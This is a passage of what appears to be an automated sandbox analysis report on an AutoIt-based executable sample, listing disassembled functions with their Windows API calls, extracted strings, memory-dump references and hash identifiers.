                                              • Instruction ID: 67d1579e2cd2f0d1e0a3b74efc2ddfb2f1b8c410a294e677478ffa8fe4d01591
                                              • Opcode Fuzzy Hash: 0acc48ed992d40cab9471dd5a55c873e01e95fef125845d0d2a37324868d73f5
                                              • Instruction Fuzzy Hash: C7E0E235244209EFDB01DF88E884E9A3BA5BB1E300F004054FA0547262CB71A820EB61
                                              Function 00B516B5 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                                • Part of subcall function 00B5201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00B520D3
                                                • Part of subcall function 00B5201B: KillTimer.USER32(-00000001,?,?,?,?,00B516CB,00000000,?,?,00B51AE2,?,?), ref: 00B5216E
                                              • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00B51AE2,?,?), ref: 00B516D4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                              • String ID:
                                              • API String ID: 2797419724-0
                                              • Opcode ID: 58680f3d70494f5a162eafdf44b2d8cf834e9a8a742237d244c48e4b09dd6417
                                              • Instruction ID: 9023519871329960233a7a94a2e3865807d8c1212ca693d49d8148e911910be2
                                              • Opcode Fuzzy Hash: 58680f3d70494f5a162eafdf44b2d8cf834e9a8a742237d244c48e4b09dd6417
                                              • Instruction Fuzzy Hash: AFD01270142308B7DE113B50DC17F597A599B59751F408061BE05291D3CA716950A598
                                              Function 00B7A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00B7A12A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: cca3169ee5d9d4dcf72a566438e974aa8594e39b53ad91a64a7b93fc7464eb7d
                                              • Instruction ID: be1d70e7357b9cf8852dec30238f5a4d460c744870e985a17fcbe6ab61f12366
                                              • Opcode Fuzzy Hash: cca3169ee5d9d4dcf72a566438e974aa8594e39b53ad91a64a7b93fc7464eb7d
                                              • Instruction Fuzzy Hash: 0AA0123000410DA7CA001B45EC04454BF5CD6001A07004021F40D410219B3254104584
                                              Function 00B68808 Relevance: .6, Instructions: 590COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c446f53b08d84fa4e82cbb76f0c6b6d924838729dac22bc74d39ebd1cff9d299
                                              • Instruction ID: 9f2cf382c96c99471667ba67928557e91acd16141424dfc809957550e177d5ff
                                              • Opcode Fuzzy Hash: c446f53b08d84fa4e82cbb76f0c6b6d924838729dac22bc74d39ebd1cff9d299
                                              • Instruction Fuzzy Hash: 9E223730508606CBDF388AA4C4D477D77E1FF42344F2882EBDA569B592DB789E91CB81
                                              Function 00B721C5 Relevance: .3, Instructions: 345COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                              • Instruction ID: 14973e1bfa812320dc693cb107ed92112594c00c3d681847bd641e9a48dd7f91
                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                              • Instruction Fuzzy Hash: B0C185322051930ADF2D473D847503EFAE19EA27B131A87EDD8BBDB1D5EE20C965D620
                                              Function 00B725FA Relevance: .3, Instructions: 341COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                              • Instruction ID: 24dc4dfc989a72fb6be43480d7d6974a2022f7467a4fb9711f3c4bc231c4de30
                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                              • Instruction Fuzzy Hash: 73C185322051930ADF2D473EC47513EBAE19EA27B131A87EDD4BBDB1D5EE20C925D620
                                              Function 00B71978 Relevance: .3, Instructions: 323COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                              • Instruction ID: c6b82ca1cf05a7471c543d14db86c40b50865be8e2ded7f27863ea2399583739
                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                              • Instruction Fuzzy Hash: D8C1733220519309DF2D463D847513EBAE1DEA27B131A9BEDD4BBDB1C4EE20C965DA30
                                              Function 00BC7806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 00BC785B
                                              • DeleteObject.GDI32(00000000), ref: 00BC786D
                                              • DestroyWindow.USER32 ref: 00BC787B
                                              • GetDesktopWindow.USER32 ref: 00BC7895
                                              • GetWindowRect.USER32(00000000), ref: 00BC789C
                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00BC79DD
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00BC79ED
                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7A35
                                              • GetClientRect.USER32(00000000,?), ref: 00BC7A41
                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00BC7A7B
                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7A9D
                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7AB0
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7ABB
                                              • GlobalLock.KERNEL32(00000000), ref: 00BC7AC4
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7AD3
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00BC7ADC
                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7AE3
                                              • GlobalFree.KERNEL32(00000000), ref: 00BC7AEE
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 00BC7B00
                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00BE2CAC,00000000), ref: 00BC7B16
                                              • GlobalFree.KERNEL32(00000000), ref: 00BC7B26
                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00BC7B4C
                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00BC7B6B
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7B8D
                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7D7A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                              • String ID: $AutoIt v3$DISPLAY$static
                                              • API String ID: 2211948467-2373415609
                                              • Opcode ID: 89ee713a66a7db44dd3abb089f052e0ad23cc225011de5afb4f2f04728a376b1
                                              • Instruction ID: ba41fcd744fa0d64080f7f11bf7b8f0b048aa7b63ec934511768fd292f4f3774
                                              • Opcode Fuzzy Hash: 89ee713a66a7db44dd3abb089f052e0ad23cc225011de5afb4f2f04728a376b1
                                              • Instruction Fuzzy Hash: 12026A71900115EFDB14DFA4CC99EAEBBB9FB49310F1481A9F916AB2A0DB709D01CF60
                                              Function 00BD356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CharUpperBuffW.USER32(?,?,00BDF910), ref: 00BD3627
                                              • IsWindowVisible.USER32(?), ref: 00BD364B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: BuffCharUpperVisibleWindow
                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                              • API String ID: 4105515805-45149045
                                              • Opcode ID: 69a163962d9a3f61504399de29301002fa954c1470f7930e8cdb53f57c711447
                                              • Instruction ID: 1203d0394c2abd8baa39a332a360c0a21b234d7abca3e99a4e9f54411ee93462
                                              • Opcode Fuzzy Hash: 69a163962d9a3f61504399de29301002fa954c1470f7930e8cdb53f57c711447
                                              • Instruction Fuzzy Hash: DCD15E702187019BCA04EF10C456A6EB7E1EF55B54F1484EAF8965B3E3EB31DE0ACB52
                                              Function 00BDA5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetTextColor.GDI32(?,00000000), ref: 00BDA630
                                              • GetSysColorBrush.USER32(0000000F), ref: 00BDA661
                                              • GetSysColor.USER32(0000000F), ref: 00BDA66D
                                              • SetBkColor.GDI32(?,000000FF), ref: 00BDA687
                                              • SelectObject.GDI32(?,00000000), ref: 00BDA696
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00BDA6C1
                                              • GetSysColor.USER32(00000010), ref: 00BDA6C9
                                              • CreateSolidBrush.GDI32(00000000), ref: 00BDA6D0
                                              • FrameRect.USER32(?,?,00000000), ref: 00BDA6DF
                                              • DeleteObject.GDI32(00000000), ref: 00BDA6E6
                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00BDA731
                                              • FillRect.USER32(?,?,00000000), ref: 00BDA763
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BDA78E
                                                • Part of subcall function 00BDA8CA: GetSysColor.USER32(00000012), ref: 00BDA903
                                                • Part of subcall function 00BDA8CA: SetTextColor.GDI32(?,?), ref: 00BDA907
                                                • Part of subcall function 00BDA8CA: GetSysColorBrush.USER32(0000000F), ref: 00BDA91D
                                                • Part of subcall function 00BDA8CA: GetSysColor.USER32(0000000F), ref: 00BDA928
                                                • Part of subcall function 00BDA8CA: GetSysColor.USER32(00000011), ref: 00BDA945
                                                • Part of subcall function 00BDA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BDA953
                                                • Part of subcall function 00BDA8CA: SelectObject.GDI32(?,00000000), ref: 00BDA964
                                                • Part of subcall function 00BDA8CA: SetBkColor.GDI32(?,00000000), ref: 00BDA96D
                                                • Part of subcall function 00BDA8CA: SelectObject.GDI32(?,?), ref: 00BDA97A
                                                • Part of subcall function 00BDA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00BDA999
                                                • Part of subcall function 00BDA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BDA9B0
                                                • Part of subcall function 00BDA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00BDA9C5
                                                • Part of subcall function 00BDA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BDA9ED
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                              • String ID:
                                              • API String ID: 3521893082-0
                                              • Opcode ID: e9295c39548670e57be9df4eeac80759faa150c4752098aac771e92af795ffd9
                                              • Instruction ID: d2da2d31ec493ff8b467935bbb80c93608f88d355a38ff54984dc53edadb479f
                                              • Opcode Fuzzy Hash: e9295c39548670e57be9df4eeac80759faa150c4752098aac771e92af795ffd9
                                              • Instruction Fuzzy Hash: 77916F72409302EFC7109F64DC48A6BBBE9FB48325F144A2AF962971A0EB71D944CB52
                                              Function 00BC74AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DestroyWindow.USER32(00000000), ref: 00BC74DE
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00BC759D
                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00BC75DB
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00BC75ED
                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00BC7633
                                              • GetClientRect.USER32(00000000,?), ref: 00BC763F
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00BC7683
                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00BC7692
                                              • GetStockObject.GDI32(00000011), ref: 00BC76A2
                                              • SelectObject.GDI32(00000000,00000000), ref: 00BC76A6
                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00BC76B6
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BC76BF
                                              • DeleteDC.GDI32(00000000), ref: 00BC76C8
                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00BC76F4
                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 00BC770B
                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00BC7746
                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00BC775A
                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00BC776B
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00BC779B
                                              • GetStockObject.GDI32(00000011), ref: 00BC77A6
                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00BC77B1
                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00BC77BB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                              • API String ID: 2910397461-517079104
                                              • Opcode ID: 3b0b5645bc2b2cbdf42642936b4edfa10beaf713a417c19f1c0f45e6cc58571e
                                              • Instruction ID: b55ae31a7babccc080d319ea2e52a01bc9d1a43ed451d0f42953288dbbddf48e
                                              • Opcode Fuzzy Hash: 3b0b5645bc2b2cbdf42642936b4edfa10beaf713a417c19f1c0f45e6cc58571e
                                              • Instruction Fuzzy Hash: 44A17EB1A40615FFEB14DBA4DC4AFAEBBB9EB45710F048155FA15A72E0DB70AD00CB60
                                              Function 00BBAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00BBAD1E
                                              • GetDriveTypeW.KERNEL32(?,00BDFAC0,?,\\.\,00BDF910), ref: 00BBADFB
                                              • SetErrorMode.KERNEL32(00000000,00BDFAC0,?,\\.\,00BDF910), ref: 00BBAF59
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ErrorMode$DriveType
                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                              • API String ID: 2907320926-4222207086
                                              • Opcode ID: fc15660b7d4e47194c17c23d5d9b8a90df3e1b6eae02775576673e5172061c01
                                              • Instruction ID: 1a89923056b557a92e7978ce2d3c73ea7de2f39d027447d21a34d554fae210ab
                                              • Opcode Fuzzy Hash: fc15660b7d4e47194c17c23d5d9b8a90df3e1b6eae02775576673e5172061c01
                                              • Instruction Fuzzy Hash: 765142B0A48605DBCB10EB10C9A2DFD73E1EB4871172480E6F847E76D1DEB19D49EB52
                                              Function 00B568DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
